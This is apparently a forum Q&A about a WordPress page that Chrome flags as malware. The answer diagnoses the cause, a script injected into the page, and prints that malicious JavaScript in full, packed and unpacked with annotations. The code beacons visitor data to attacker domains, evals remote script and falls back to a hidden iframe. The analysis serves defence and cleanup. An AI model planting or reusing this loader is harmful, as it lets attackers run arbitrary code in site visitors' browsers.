
The site ahead contains malware


I'm getting an error with the WordPress page REMOVED, it seems that the website 2zz3.gq is being "injected" into the request but I'm not really sure when or how.

When I try to load the page on Chrome I see a "The site ahead contains malware" error:

[Screenshot: Chrome's "The site ahead contains malware" interstitial — image not reproduced here]

But I see no error on Firefox or other browsers. How can I solve this issue? So far I have tried:

  • Running WordFence Plugin for Malware removal (no infections found)
  • Running Sucuri Security Plugin (also no threats found)
  • I blocked incoming requests from 2zz3.gq (apparently a server in Russia) at my server, but the error still appears in Chrome.

Could please someone give me some advice on this issue?


Solution

  • Is the plugin disabled now?

    Check the source your site actually serves (fetch it with curl rather than trusting the admin view) and compare your WordPress core, theme and plugin files against clean copies to see whether anything has been modified.

    The safest option is usually to restore from a backup that you know predates the compromise — cleaning by hand makes it easy to miss a malicious change — and then rotate your WordPress, database and hosting credentials, since whatever injected this code may still have a way in.


    WARNING

    This is malicious code. I've put it on here for explanation purposes, but I'd recommend that you DO NOT execute this

    It's not as bad as a link that someone might accidentally click, and I figure this warning should suffice for anyone who decides that pasting this into their JS console seems like a good idea...


    When I fetch your site with curl I see the following packed (p,a,c,k,e,d-style) code block in the HTML your server returns, so the injection is present in the served page itself rather than being added by the visitor's browser:

    // p,a,c,k,e,d-style packer: the outer eval() first rebuilds the real source by
    // substituting every numeric token in the body with the matching entry of the
    // '|'-separated dictionary at the end, then runs the result. The unpacked
    // source is reproduced further down. Do not execute this.
    eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('26 25(7,13){15 9=7.80(13);10(9>78)49"76: 83 100 5";19 9}26 35(7){10(1!==85.22)49"93: 92 88 86 87";7=99(7);15 13,9,17=[],31=7.22-7.22%3;10(0===7.22)19 7;97(13=0;31>13;13+=3)9=25(7,13)<<16|25(7,13+1)<<8|25(7,13+2),17.28(20.21(9>>18)),17.28(20.21(9>>12&63)),17.28(20.21(9>>6&63)),17.28(20.21(63&9));96(7.22-31){74 1:9=25(7,13)<<16,17.28(20.21(9>>18)+20.21(9>>12&63)+33+33);77;74 2:9=25(7,13)<<16|25(7,13+1)<<8,17.28(20.21(9>>18)+20.21(9>>12&63)+20.21(9>>6&63)+33)}19 17.55("")}15 33="=",20="79+/",81="1.0";26 51(){15 11;37{11=39 68("82.70")}44(17){37{11=39 68("94.70")}44(95){11=90}}10(!11&&91 66!=\'89\'){11=39 66()}19 11}26 72(14){23=14.30(\'\\<54\');10(23==-1)19\'\';23=14.30(\'>\',23);10(23==-1)19\'\';23++;24=14.30(\'\\<\\/54\\>\',23);10(24==-1)19\'\';19 14.58(23,24)}26 64(14){10(14.30(\'%48%\')==-1)19 14;19 14.98(\'%48%\').55(36(35(62.65.75)))}26 60(56){15 27=" "+34.27;15 40=" "+56+"=";15 38=42;15 29=0;15 24=0;10(27.22>0){29=27.30(40);10(29!=-1){29+=40.22;24=27.30(";",29);10(24==-1){24=27.22}38=84(27.58(29,24))}}19(38)}34.107(\'<57 132="43"></57>\');10(60(\'133\')==42){15 32=\'50\'+\'7\'+\'45:\'+\'/\'+\'/\'+\'2\'+\'61\'+\'61\'+\'3\'+\'.\'+\'47\'+\'134\'+\'/\'+\'131\'+\'73\'+\'7.45\'+\'67\';32+=(\'?7=3&126=\'+36(35(62.65.125)));32+=(\'&101=\'+36(35(127.128)));37{15 11=51();11.129(\'136\',32,137);11.145=26(){10(11.146==4&&11.142==138){14=64(11.139);34.71("43").69=14;41=72(14);10(41.22>0)140(41)}};11.141(42)}44(17){34.71("43").69=\'<\'+\'59\'+\'46\'+\'144 124\'+\'108\'+\'="52\'+\'109\'+\':/\'+\'/\'+\'110\'+\'2\'+\'-\'+\'53\'+\'102\'+\'53\'+\'.\'+\'47\'+\'73\'+\'/\'+\'103\'+\'104\'+\'112\'+\'.45\'+\'67"\'+\' 113\'+\'121=\'+\'"0\'+\'" 122\'+\'119\'+\'7="0\'+\'" 46\'+\'118\'+\'114\'+\'31="\'+\'0" 115\'+\'116\'+\'117\'+\'52="\'+\'0" 
123\'+\'120\'+\'105\'+\'50="\'+\'0" 106\'+\'111\'+\'143\'+\'47="\'+\'130\'+\'">\'+\'<\'+\'/\'+\'59\'+\'46\'+\'135\'+\'17\'+\'>\'}}',10,147,'|||||||t||_|if|xmlhttp||A|src|var||e||return|_ALPHA|charAt|length|start|end|_pref_xxs_getbyte|function|cookie|push|offset|indexOf|r|url|_PADCHAR|document|_pref_xxs_encode64|encodeURIComponent|try|setStr|new|search|code|null|statspan_0_1|catch|p|fr|g|ENCURL|throw|ht|_pref_xxs_getXmlHttp|h|b|script|join|name|span|substring|i|_pref_xxs_getCookie|z|window||_pref_xxs_processMacro|location|XMLHttpRequest|hp|ActiveXObject|innerHTML|XMLHTTP|getElementById|_pref_xxs_extractScript|a|case|href|INVALID_CHARACTER_ERR|break|255|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|charCodeAt|_VERSION|Msxml2|DOM|unescape|arguments|argument|required|one|undefined|false|typeof|exactly|SyntaxError|Microsoft|E|switch|for|split|String|Exception|ua|o|co|un|nheig|sc|write|rc|ttp|l|rol|ter|wid|rde|mar|ginw|idt|amebo|gh|rgi|th|hei|ma|s|hostname|d|navigator|userAgent|open|no|st|id|stat01|q|am|GET|true|200|responseText|eval|send|status|lin|ame|onreadystatechange|readyState'.split('|'),0,{}))
    

    which, once unpacked, reads as follows (annotated; this is the same malicious code, still not something to run):

    // Base64 helper: returns the char code at index A of t, refusing anything
    // above 0xFF so the encoder below only ever works on single-byte values.
    function _pref_xxs_getbyte(t,A)
        {
        var _=t.charCodeAt(A);
        // Imitates the DOM's INVALID_CHARACTER_ERR; note it throws a bare string, not an Error.
        if(_>255)throw"INVALID_CHARACTER_ERR: DOM Exception 5";
        return _
    }
    // Plain base64 encoder (standard A-Z a-z 0-9 + / alphabet, '=' padding) over
    // the single-byte characters of t. Used later to obscure the hostname, user
    // agent and page URL before they are sent to the attacker's host. Relies on
    // _ALPHA and _PADCHAR, which are declared after this function.
    function _pref_xxs_encode64(t)
        {
        if(1!==arguments.length)throw"SyntaxError: exactly one argument required";
        t=String(t);
        // r = length rounded down to a multiple of 3: the part encoded as full 24-bit groups.
        var A,_,e=[],r=t.length-t.length%3;
        if(0===t.length)return t;
        // Three input bytes -> one 24-bit value -> four 6-bit alphabet indices.
        for(A=0;
        r>A;
        A+=3)_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8|_pref_xxs_getbyte(t,A+2),e.push(_ALPHA.charAt(_>>18)),e.push(_ALPHA.charAt(_>>12&63)),e.push(_ALPHA.charAt(_>>6&63)),e.push(_ALPHA.charAt(63&_));
        // The 1 or 2 leftover bytes get the usual '==' / '=' padding.
        switch(t.length-r)
            {
            case 1:_=_pref_xxs_getbyte(t,A)<<16,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_PADCHAR+_PADCHAR);
            break;
            case 2:_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_ALPHA.charAt(_>>6&63)+_PADCHAR)
        }
        return e.join("")
    }
    // Padding character and standard base64 alphabet consumed by _pref_xxs_encode64.
    // _VERSION is never read anywhere in this listing.
    var _PADCHAR="=",_ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_VERSION="1.0";
    // Returns an XHR object, trying the legacy ActiveX variants (old IE) first and
    // falling back to the native XMLHttpRequest. Returns false if none exists; the
    // caller's .open() would then throw, which is how its iframe fallback is reached.
    function _pref_xxs_getXmlHttp()
        {
        var xmlhttp;
        try
            {
            xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
        }
        catch(e)
            {
            try
                {
                xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
            }
            catch(E)
                {
                xmlhttp=false
            }
        }
        // Any non-IE browser lands here.
        if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
            {
            xmlhttp=new XMLHttpRequest()
        }
        return xmlhttp
    }
    // Returns the body of the first <script ...>...</script> in src, or '' if there
    // is none. A naive indexOf scan rather than an HTML parser: it takes whatever
    // sits between the first '>' after '<script' and the next '</script>'.
    // start and end are never declared, so they leak as globals.
    function _pref_xxs_extractScript(src)
        {
        start=src.indexOf('\<script');
        if(start==-1)return'';
        start=src.indexOf('>',start);
        if(start==-1)return'';
        start++;
        end=src.indexOf('\<\/script\>',start);
        if(end==-1)return'';
        return src.substring(start,end)
    }
    // Replaces every %ENCURL% placeholder in the fetched payload with the
    // URL-encoded base64 of the current page URL, so the remote host can refer
    // back to the infected page's address from whatever it sends down.
    function _pref_xxs_processMacro(src)
        {
        if(src.indexOf('%ENCURL%')==-1)return src;
        return src.split('%ENCURL%').join(encodeURIComponent(_pref_xxs_encode64(window.location.href)))
    }
    // Returns the value of the cookie called `name` from document.cookie, or null
    // when it is not set. Used below to gate the beacon on the stat01 cookie.
    function _pref_xxs_getCookie(name)
        {
        // Leading space so " name=" also matches the first cookie in the string.
        var cookie=" "+document.cookie;
        var search=" "+name+"=";
        var setStr=null;
        var offset=0;
        var end=0;
        if(cookie.length>0)
            {
            offset=cookie.indexOf(search);
            if(offset!=-1)
                {
                offset+=search.length;
                // The line break inside the string here is an artifact of how this
                // listing was extracted; the packed form reads indexOf(";",offset).
                end=cookie.indexOf(";
                ",offset);
                if(end==-1)
                    {
                    end=cookie.length
                }
                setStr=unescape(cookie.substring(offset,end))
            }
        }
        return(setStr)
    }
    // Entry point: drop an empty span into the page as a landing container, then
    // beacon to the attacker's host and eval whatever it sends back.
    document.write('<span id="statspan_0_1"></span>');
    // Gate on the stat01 cookie. Nothing in this listing ever sets it, so it is
    // presumably set by the fetched payload — unverified.
    if(_pref_xxs_getCookie('stat01')==null)
        {
        // http://2zz3.gq/stat.php, assembled from fragments so the domain never
        // appears as a literal string in the page (likely to dodge simple signature scans).
        var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
        // Query string: t=3 (fixed), d=base64(hostname), ua=base64(user agent).
        url+=('?t=3&d='+encodeURIComponent(_pref_xxs_encode64(window.location.hostname)));
        url+=('&ua='+encodeURIComponent(_pref_xxs_encode64(navigator.userAgent)));
        try
            {
            var xmlhttp=_pref_xxs_getXmlHttp();
            // Asynchronous cross-origin GET. NOTE(review): in a current browser the
            // status==200 branch below only runs if the remote host answers with
            // permissive CORS headers; otherwise status stays 0 and nothing happens.
            xmlhttp.open('GET',url,true);
            xmlhttp.onreadystatechange=function()
                {
                if(xmlhttp.readyState==4&&xmlhttp.status==200)
                    {
                    // Expand %ENCURL%, inject the response HTML into the span, then
                    // pull out the first <script> body and eval it: arbitrary remote
                    // JavaScript runs in the visitor's browser. src and code are
                    // undeclared and leak as globals.
                    src=_pref_xxs_processMacro(xmlhttp.responseText);
                    document.getElementById("statspan_0_1").innerHTML=src;
                    code=_pref_xxs_extractScript(src);
                    if(code.length>0)eval(code)
                }
            };
            xmlhttp.send(null)
        }
        // Only synchronous failures in the setup above are caught here (e.g. no
        // XHR object, so .open threw); an asynchronous network failure is not.
        catch(e)
            {
            // Fallback: load http://l2-bob.ga/counter.php in a 0x0, borderless,
            // non-scrolling iframe — a second attacker-controlled domain.
            document.getElementById("statspan_0_1").innerHTML='<'+'i'+'fr'+'ame s'+'rc'+'="h'+'ttp'+':/'+'/'+'l'+'2'+'-'+'b'+'o'+'b'+'.'+'g'+'a'+'/'+'co'+'un'+'ter'+'.p'+'hp"'+' wid'+'th='+'"0'+'" hei'+'gh'+'t="0'+'" fr'+'amebo'+'rde'+'r="'+'0" mar'+'ginw'+'idt'+'h="'+'0" ma'+'rgi'+'nheig'+'ht="'+'0" sc'+'rol'+'lin'+'g="'+'no'+'">'+'<'+'/'+'i'+'fr'+'am'+'e'+'>'
        }
    }
    

    Note the line

    var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
    

    which builds the 2***.gq URL[1] by concatenating single characters, so the domain never appears as a literal string in the page source (likely why a plain signature scan did not flag it).

    If the visitor does not have a stat01 cookie set, it requests stat.php from that host (presumably a malicious JavaScript source), writes the response into the statspan_0_1 span via innerHTML, extracts the first <script> body from it and executes it with eval — in other words the attacker can run arbitrary JavaScript in every visitor's browser. Note that this request is made by the visitor's browser, not by your server, which is why blocking that host at your server changed nothing. Chrome's Safe Browsing list presumably already knows the domain, which is the likely reason only Chrome shows the interstitial.

    In the process of making the request it also sends up some data about the visitor — the current hostname (d=) and the browser's user agent (ua=), each base64-encoded — presumably for metrics, for serving a payload tailored to the browser, or both.

    Note that if setting up the request throws (the catch branch), it falls back to loading l2***.ga/counter.php[1] — a second attacker-controlled domain — in a 0×0 iframe.

    [1] Links purposely broken; see the code above if you're interested.